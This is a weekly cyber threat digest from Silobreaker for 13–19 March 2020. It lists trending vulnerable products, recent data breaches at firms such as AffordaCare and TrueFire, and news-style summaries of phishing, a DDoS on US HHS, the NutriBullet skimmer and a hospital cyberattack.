Threat Reports / Weekly Threat Reports

Threat Summary: 13 – 19 March 2020

13 – 19 March 2020

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7d
VMware Workstation

Microsoft SMBv3

Trend Micro Apex One

cPanel

Gentoo Linux
Deep & Dark Web
Name Heat 7d
cPanel

Microsoft Office 365

Microsoft .NET Framework

Google Play

VirtualEnv

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches
Company Information Affected
Open Exchange Rates (UK) Open Exchange Rates discovered that an unauthorised individual had gained access to the company’s network, and a database containing user information, following a security breach at one of its third-party IT providers. Potentially stolen data included names and email addresses, encrypted or hashed passwords, IP addresses, personal and/or business names and addresses, country of residence, and website address. App IDs, or API keys, were also exposed, and users are recommended to generate new ones. Unknown
Northeast Radiology (US) On January 11th, 2020, Northeast Radiology was informed by their managed service provider Alliance Healthcare that unauthorised individuals accessed Northeast Radiology’s picturing archive and communication system. The exposed information includes names, genders, dates of birth, medical record numbers, and more. In some cases, this may have corresponded to the patient’s Social Security number. 29
Skolaro (India) Security researcher Roni Suchowski discovered an unsecured server belonging to the online school management platform Skolaro. The database contained over 130,000 user IDs and passwords belonging to present or former users, as well as medical records, photos, passport scans, and more. >50,000
Aerial Direct (UK) Telecommunications service provider Aerial Direct notified customers that an unknown unauthorised third party accessed an external backup database on February 26th, 2020. The database contained the data of current and expired subscribers from the last six years.Details exposed in the breach include names, dates of birth, phone numbers, email addresses, and more. The compan stated that no financial information or passwords were exposed. Unknown
Blisk (Estonia) Researchers at Security Discovery identified an exposed Elasticsearch database over 3.4GB in size. It contained IP addresses, User Agent details, and email addresses. The researchers stated that the database appears to show that the Blisk browser was collecting data and bypassing user security measures. The researchers discovered the database on December 2nd, 2019, and the breach was resolved by Blisk on December 9th, 2019. Unknown
AffordaCare (US) Maze ransomware operators uploaded data from the Texas-based AffordaCare clinic, claiming to have stolen a total of 40 GB in an attack that occurred on February 1st, 2020. According to the operators, AffordaCare failed to pay the demanded ransom. The uploaded files include patient insurance claim forms, workers’ compensation documentation, employee payroll information, and more. Exposed data includes patients’ full names, Social Security numbers, dates of birth, diagnosis codes, patient addresses, billing information, and more. Unknown
Advanced Urgent Care of Florida Keys (US) Data belonging to Advanced Urgent Care of the Florida Keys was discovered on a Russian-language forum. According to the poster, the clinic had refused to pay, indicating that ransomware was involved in the attack. It remains unclear who was behind the attack. Patients’ personal information is included in the data dump, mostly scans of reports with handwritten notes and results. The personal information includes protected health information, as well as billing information, such as first and last names, phone numbers, email addresses, and co-pay status on bills. The data appears to have been exfiltrated on or around March 1st, 2020. >14,000
Randleman Eye Center (US) On January 13th, 2020, Randleman Eye Center discovered that certain files on its systems had been encrypted by malware, including a server containing patients’ protected health information. The attack occurred on or around January 10th, 2020. Potentially exposed data includes patients’ first and last names, dates of birth, gender, and digital retinal images. No evidence was found to suggest that the data had been stolen in the attack. Unknown
College of DuPage (US) The College of DuPage is informing its employees of a data breach that may have exposed their personal and tax information. The breach concerns 2018 W-2 forms of 1,755 current and former employees. The college does not believe the data has been stolen or used for fraudulent purposes. 1,755
Wichita State University (US) WSU reported that between December 3rd and December 5th, 2019, an unauthorized party accessed a server that the university used to operate student and employee web portals. The accessible data included names, email addresses, dates of birth, and Social Security numbers. WSU began to notify impacted parties on March 6th, 2020. 1,762
Advantage Capital Funding and Argus Capital Funding (US) Researchers at vpnMentor discovered a breached database that appears to be linked to MCA Wizard, an app developed by the companies. The database, which was 425GB in size, contained over 500,000 documents, including credit reports, bank statements, contracts, legal paperwork, driver’s licenses, Social Security information, and more. The breach affects both companies, as well as their customers, clients, contractors, employees and partners. Unknown
TrueFire (US) TrueFire notified customers that an unauthorised party gained access to their website and accessed customer data while it was being entered. The breach, which occurred between August 3rd, 2019, and January 14th, 2020, exposed customers’ names, addresses, payment card account number, security codes, and card expiration dates. Unknown

This table shows a selection of leaks and breaches reported this week.

Malware Mentions in relation to the Coronavirus Outbreak

This chart shows the trending malware related to the Coronavirus Outbreak over the last week.

Weekly Industry View
Industry Information
Banking & Finance Cofense researchers discovered a new phishing scam targeting customers of the African financial services ABSA Group. The phishing email consists of simple text informing the customer of pending transfers from another bank account, yet does not attempt to imitate legitimate ABSA communication. Victims are asked to download and open an htm attachment that redirects them to a fake ABSA online banking portal. This is hosted on a hijacked domain belonging to the Pakistani education activist Ahmed Nawaz and looks almost identical to the real ABSA portal.
Government The US Department of Health and Human Services (HHS) was hit in what is described as a ‘campaign of disruption and disinformation’ believed to have been carried out by a foreign threat actor. The HHS servers were hit millions of times over several hours in an attempt to slow its systems down, which reportedly failed. In a tweet on March 15th, 2020, the National Security Council warned of fake messages informing users that the government was planning a two-week mandatory quarantine for the entire country. This message, spread via text, email and social media, is believed to be related to the attack on HHS.
Education Abnormal Security reported that threat actors were taking advantage of the confusion surrounding the operational status of higher education institutes in order to try and obtain user login details. Attackers disseminated an email to between 10,000 and 20,000 users which purported to be from university health teams. The researchers did not disclose the names of targeted institutions. The message contained a link which would redirect to a phishing site disguised as an Office 365 login page.
Retail, Hospitality & Tourism Researchers at RiskIQ discovered a JavaScript skimmer on NutriBullet’s website on February 20th, 2020, which has been attributed to Magecart Group 8. Despite the exfiltration domain being taken down by RiskIQ and the skimmer being removed on March 1st 2020, a new skimmer was placed on the website on March 5th and again on March 10th, 2020. The researchers believe the threat actors themselves removed the first skimmer following the domain takedown. The third skimmer was added after the group’s new domain had already been taken down. The researchers note that NutriBullet failed to respond to multiple attempts to contact them, meaning that re-infection could continue until NutriBullet secures its infrastructure. The researchers advise against making any purchases on the site at present. NutriBullet has since confirmed the skimmer attack and has implemented new security measures after Forbes reached out regarding the risk on March 17th, 2020.
Healthcare The University Hospital in Brno, which hosts one of 18 Czech laboratories testing for coronavirus, was hit by a cyberattack on March 13th, 2020. It is unclear what type of malware was involved in the attack. According to the director of the hospital, its computer systems started ‘falling gradually’ and needed to be shut down.

News and information concerning each mentioned industry over the last week.

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.
The Silobreaker Team

More News

  • COVID-19 Alert – 05 June 2020

    Silobreaker's Daily COVID-19 Alert for 05 June 2020
  • Cyber Alert – 05 June 2020

    Cyber Alert: troyhunt - RT @haveibeenpwned: New breach: Indian self-drive car rental company Zoomcar was breached in 2018 and had 3.5M records exposed then...
  • Threat Summary: 29 May – 04 June 2020

    29 May – 04 June 2020 Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are...
View all News

Request a demo

Get in touch